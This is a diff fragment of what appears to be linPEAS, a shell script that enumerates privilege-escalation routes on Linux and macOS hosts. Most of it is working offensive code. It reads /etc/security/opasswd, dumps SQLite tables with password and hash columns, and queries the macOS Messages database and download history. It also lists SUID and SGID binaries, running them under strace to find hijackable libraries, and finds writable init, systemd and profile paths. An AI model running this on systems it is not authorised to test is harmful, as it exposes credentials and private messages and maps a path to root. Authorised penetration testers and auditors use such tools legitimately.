possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! 
[ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! 
-perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! 
"$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} 
"s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! 
"$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + echo "$s (Unknown SUID binary)" | sed -${E} 
"s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi fi done - echo "" + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi fi fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! 
-path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! 
[ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 
+ timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done fi - echo "" +done +echo "" - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat 
"/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," fi - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! 
-path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" +##-- IF) Users with capabilities +print_2title "Users with capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else echo_not_found "/etc/security/capability.conf" +fi +echo "" - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - ##-- IF) Interesting writable files by ownership or all - if ! 
[ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! 
[ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + +print_2title "Broken links in path" +echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; +done +echo "" + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+ if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+fi
+echo ""
+
+##-- IF) Hashes in passwd file
+print_list "Hashes inside passwd file? ........... "
